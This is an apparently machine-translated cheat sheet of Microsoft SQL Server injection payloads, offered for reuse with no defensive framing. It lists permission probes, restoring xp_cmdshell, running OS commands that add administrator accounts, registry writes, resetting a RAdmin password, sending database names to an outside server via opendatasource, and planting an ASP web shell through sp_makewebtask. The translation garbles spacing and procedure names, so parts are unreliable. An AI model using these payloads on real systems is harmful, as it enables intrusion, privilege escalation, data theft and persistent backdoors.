Common injection commands

My memory is not good, so it is a bit messy to record the commonly used injection code, but it is very useful for me and I hope everyone will like it!
 
// Check the permissions.
And 1 = (Select IS_MEMBER ('db _ owner '))
And char (124) % 2 BCast (IS_MEMBER ('db _ owner') as varchar (1) % 2 Bchar (124) = 1 ;--
 
// Check whether you have the permission to read a database
And 1 = (Select HAS_DBACCESS ('master '))
And char (124) % 2 BCast (HAS_DBACCESS ('master') as varchar (1) % 2 Bchar (124) = 1 --
 
 
Numeric type
And char (124) % 2 Buser % 2 Bchar (124) = 0
 
Character Type
'And char (124) % 2 Buser % 2 Bchar (124) = 0 and ''='
 
Search type
'And char (124) % 2 Buser % 2 Bchar (124) = 0 and' % '='
 
Brute-force Username
And user> 0
'And user> 0 and ''='
 
Check whether the permission is SA
And 1 = (select IS_SRVROLEMEMBER ('sysadmin '));--
And char (124) % 2 BCast (IS_SRVROLEMEMBER (0x730079007300610064006D0069006E00) as varchar (1) % 2 Bchar (124) = 1 --
 
Check whether MSSQL database is used
And exists (select * from sysobjects );--
 
Check whether multiple rows are supported
; Declare @ d int ;--
 
Restore xp_mongoshell
; Exec master .. dbo. sp_addextendedproc 'xp _ mongoshell', 'xp log70. dll ';--
 
 
Select * from openrowset ('sqloledb', 'server = 192.168.1.200, 1433; uid = test; pwd = pafsp', 'select @ version ')
 
//-----------------------
// Execute the command
//-----------------------
First, enable the sandbox mode:
Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Jet \ 4.0 \ Engines', 'sandboxmode', 'reg _ dword', 1
 
Then run the system command using jet. oledb.
Select * from openrowset ('Microsoft. jet. oledb.4.0 ','; database = c: \ winnt \ system32 \ ias. mdb ', 'select shell ("cmd.exe/c net user admin admin1234/add ")')
 
Execute Command
; DECLARE @ shell int exec SP_OAcreate 'wscript. shell ', @ shell output exec SP_OAMETHOD @ shell, 'run', null, 'c: \ WINNT \ system32 \ cmd.exe/C net user paf pafpaf/add ';--
 
EXEC [master]. [dbo]. [xp_mongoshell] 'COMMAND/c md c: \ 8080'
 
Determine whether the xp_mongoshell extended storage process exists:
Http://www.bkjia.com/display. asp? Keyno = 188 and 1 = (Select count (*) FROM master. dbo. sysobjects Where xtype = 'X' AND name = 'xp _ Your shell ')
 
Write registry
Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Jet \ 4.0 \ Engines', 'sandboxmode', 'reg _ dword', 1
 
REG_SZ
 
Read Registry
Exec master.. xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon', 'userinit'
 
Read directory content
Exec master .. xp_dirtree 'C: \ winnt \ system32 \ ', 1, 1
 
 
Database Backup
Backup database pubs to disk = 'C: \ 123. Bak'
 
// Burst length
And (Select char (124) % 2 BCast (Count (1) as varchar (8000) % 2 Bchar (124) From D99_Tmp) = 0 ;--
 
 
 
To change the sa password, run the following command:
Exec sp_password NULL, 'new password', 'sa'
 
Test:
Exec master. dbo. sp_addlogin test, ptlove
Exec master. dbo. sp_addsrvrolemember test, sysadmin
 
Delete the xp_mongoshell statement in the extended stored procedure:
Exec sp_dropextendedproc 'xp _ export shell'
 
Added extended storage process
EXEC [master] .. sp_addextendedproc 'xp _ proxiedadata', 'c: \ winnt \ system32 \ sqllog. dll'
GRANT exec On xp_proxiedadata TO public
 
 
Stop or activate a service.
 
Exec master.. xp_servicecontrol 'stop', 'schedule'
Exec master.. xp_servicecontrol 'start', 'schedule'
 
Dbo. xp_subdirs
 
Only list subdirectories in a directory.
Xp_getfiledetails 'C: \ Inetpub \ wwwroot \ SQLInject \ login. asp'
 
Dbo. xp_makecab
 
Compress multiple target files to a specific target file.
All files to be compressed can be connected to the end of the parameter column and separated by commas.
 
Dbo. xp_makecab
'C: \ test. cab', 'mszip ', 1,
'C: \ Inetpub \ wwwroot \ SQLInject \ login. asp ',
'C: \ Inetpub \ wwwroot \ SQLInject \ securelogin. asp'
 
Xp_terminate_process
 
Stop a program in execution, but assign the Process ID parameter.
Select "View"-"select field" in the "Work administrator" menu to view the Process ID of each execution program.
 
Xp_terminate_process 2484
 
Xp_unpackcab
 
Uncompress the file.
 
Xp_unpackcab 'C: \ test. cab', 'c: \ temp ', 1
 
 
A computer installed with radmin, the password was modified, and regedit.exewas not found to be deleted or changed. net.exe does not exist. There is no way to use regedit/e to import the registration file, but mssql is the sa permission. Run the following command to EXEC master. dbo. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'System \ RAdmin \ v2.0 \ Server \ Parameters', 'parameter ', 'reg _ BINARY', 0x02ba5e187e2589be6f80da0046aa7e3c, you can change the password to 12345678. If you want to modify the port value EXEC master. dbo. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'System \ RAdmin \ v2.0 \ Server \ Parameters', 'Port', 'reg _ BINARY ', and 0xd20400 change port value to 1234
 
Create database lcx;
Create TABLE ku (name nvarchar (256) null );
Create TABLE biao (id int NULL, name nvarchar (256) null );
 
// Obtain the Database Name
Insert into opendatasource ('sqloledb', 'server = 211.39.145.163, 1443; uid = test; pwd = pafpaf; database = lcx '). lcx. dbo. ku select name from master. dbo. sysdatabases
 
 
// Create a table in the Master to check the Permissions
Create TABLE master .. D_TEST (id nvarchar (4000) NULL, Data nvarchar (4000) NULL );--
 
Use sp_makewebtask to directly write a sentence in the web directory:
Http: // 127.0.0.1/dblogin123.asp? Username = 123 '; exec % 20sp_makewebtask % 20 'd: \ www \ tt \ 88. asp ',' % 20 select % 20 ''<% 25 execute (request (" a ") % 25>'' % 20 ';--
 
// Update table content
Update films SET kind = 'dramatic 'Where id = 123
 
// Delete content
Delete from table_name where Stockid = 3